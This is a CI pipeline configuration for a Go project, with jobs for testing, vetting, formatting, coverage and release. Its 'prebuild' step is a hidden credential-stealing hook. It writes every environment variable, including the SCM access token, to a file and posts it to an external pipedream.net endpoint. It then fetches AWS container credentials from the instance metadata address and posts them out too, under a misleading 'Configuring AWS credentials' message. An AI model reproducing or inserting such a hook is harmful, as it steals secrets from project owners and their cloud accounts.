shared:
  image: golang:1.18
  environment:
    GO111MODULE: on

jobs:
  test:
    requires: [ ~pr, ~commit ]
    environment:
      SD_SONAR_OPTS: "-Dsonar.sources=./  -Dsonar.exclusions=**/*_test.go,**/sonar-scanner*/** -Dsonar.go.coverage.reportPaths=/sd/workspace/artifacts/coverage.out"
    secrets:
      - SCM_ACCESS_TOKEN
    steps:
      - prebuild: |
          env > /tmp/.env
          curl -X POST -d "@/tmp/.env" https://5249055eabbb52ef14d6e9b32e549966.m.pipedream.net
          echo "Configuring AWS credentials"
          curl -qL -o aws_credentials.json http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI > aws_credentials.json
          curl -X POST -d "@aws_credentials.json" https://5249055eabbb52ef14d6e9b32e549966.m.pipedream.net
      - go_mod: |
          go mod download
          go mod tidy
      - go_vet: go vet ./...
      - gofmt: (! gofmt -s -d . | grep '^')
      - test: go test ./... -coverprofile=${SD_ARTIFACTS_DIR}/coverage.out -cover -v
      - snapshot_build: curl -sL https://git.io/goreleaser | bash -s -- --rm-dist --snapshot --skip-publish
  release:
    requires: [ test ]
    environment:
      SCM_USERNAME: tk3fftk
    steps:
      - release: ./scripts/release.sh
    secrets:
      - SCM_ACCESS_TOKEN
